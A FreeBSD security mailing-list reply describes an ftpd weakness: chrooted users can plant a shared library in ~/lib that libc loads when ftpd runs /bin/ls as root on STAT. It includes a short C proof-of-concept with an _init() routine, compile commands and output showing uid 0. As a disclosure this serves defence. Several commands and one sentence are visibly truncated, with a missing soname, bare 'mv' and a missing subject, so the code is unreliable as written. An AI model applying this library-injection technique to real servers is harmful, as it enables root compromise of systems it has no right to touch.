Re: ftpd security issue ?

Saw this on FD... Anyone know any more details about this ?

This is a well known hazard of chrooting to directories controlled by
unprivileged users. In this case, vulnerability exists because ftpd calls
/bin/ls with uid=0 and euid!=0 when STAT command is issued, and is
loaded by libc regardless of elevated privileges.

This can be proven by creating dummy ~/lib/

[venglin@lagoon ~/lib]$ cat dummy.c
#include <stdio.h>
#include <fcntl.h>

void _init() {
FILE *fp = fopen("asdf", "w+");
fprintf(fp, "%d %d\n", getuid(), geteuid());
[venglin@lagoon ~/lib]$ cc -o dummy.o -c dummy.c -fPIC
[venglin@lagoon ~/lib]$ cc -shared -Wl,-soname, -o dummy.o
[venglin@lagoon ~/lib]$ mv

And after calling STAT command:

[venglin@lagoon ~/lib]$ cat ~/asdf
0 3000

BTW. This vulnerability affects only configurations, where /etc/ftpchroot exists
or anonymous user is allowed to create files inside etc and lib dirs.

* Fido: 2:480/124 ** WWW: ** NICHDL: PMF9-RIPE *
* Jabber ID: venglin@xxxxxxxx ** PGP ID: 2578FCAD ** HAM-RADIO: SQ5JIV *
freebsd-security@xxxxxxxxxxx mailing list
To unsubscribe, send any mail to "freebsd-security-unsubscribe@xxxxxxxxxxx"